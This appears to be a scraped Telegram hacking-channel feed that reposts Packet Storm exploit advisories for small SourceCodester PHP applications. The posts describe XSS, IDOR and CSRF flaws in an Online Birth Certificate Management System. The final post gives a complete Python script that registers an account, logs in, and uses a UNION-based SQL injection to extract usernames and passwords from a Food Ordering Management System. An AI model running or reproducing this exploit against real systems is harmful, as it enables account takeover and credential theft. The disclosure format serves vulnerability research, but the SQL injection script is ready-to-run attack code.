Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Scripting

https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.

SHA-256 | 943388058f90bc4b22c687ef0d6cbdb5a64f64c8d68d43bb23f0b86408b86d92

Download
# Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# no token in update profile admin
search recoder
search

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Scripting

https://2.bp.blogspot.com/-7dI_F0yeiSk/WWlvAqxVj9I/AAAAAAAAIKQ/m4aOGdGGTmo7o3qANzxUijwjE_G1NHOSQCLcBGAs/s1600/h123.png
Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

SHA-256 | 7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86

Download
# Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
Vulnerability Details
======================

Steps :
1) Log in to the application after register new user

Username: test
Password: 12345

2) Navigate to Birth Reg Form and Click on Add Details.

3) add full name payload =>

4) and all field enter payload only Contact Number enter number

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Insecure Direct Object Reference

https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
Online Birth Certificate Management System version 1.0 suffers from an insecure direct object reference vulnerability.

SHA-256 | d518fb678e05f322e7641da9649d676bbd4181439b71880505b5b152205524bb

Download
# Exploit Title: Online Birth Certificate Management System - Insecure Direct Object Reference (IDOR)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0
Vulnerability Details
======================

Steps :
1) Log in to the application after register new user

Username: test
Password: 12345

2) Navigate to Birth Reg Form and Click on Manage Details and click any Birth number.

3)In /OBCMS/user/view-application-detail.php?viewid=1, modify the id Parameter to View birthreg details,

First Name, Phone number, and other data

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Birth Certificate Management System 1.0 Cross Site Request Forgery

https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.

SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe

Download
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# no token in update profile admin
CSRF update Profile
Save Change

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Food Ordering Management System 1.0 SQL Injection

https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Food Ordering Management System version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | 1be2c696b62c411f0a88c3819a1d4653e0f042e7aa59018ccd5596555ca02a4b

Download
# Exploit Title: Food Ordering Management System - SQL Injection
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

#/usr/bin/python3

import requests
import os
import sys
import time
import random
from bs4 import BeautifulSoup

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
# #
# SQL injection (Food Ordering Management System) #
# #
##################################################################
'''
print(logo)

url = str(input("Enter website url => "))
username = str(input("Enter Username => : "))
name = ("test123456")
password = ("test123456")
phone = ("4511233199")
number = ("1234567891000000")
cvv = ("444")

req = requests.Session()

regsiter_page = (url+"/foms/routers/register-router.php")
regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}
req_regsiter = req.post(regsiter_page,data=regsiter)
print("[+] Regsiter Successfully")

login = {'username':username,'password':password}
login_page = (url+"/foms/routers/router.php")
req_login = req.post(login_page,data=login)
print("[+] Login Successfully")

sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")
text = sql.text
soup = BeautifulSoup(text,"html.parser")

print("[+] SQL Injction Get Users and Password from table Users")
for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):
time.sleep(0.2)
print(link.get)

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video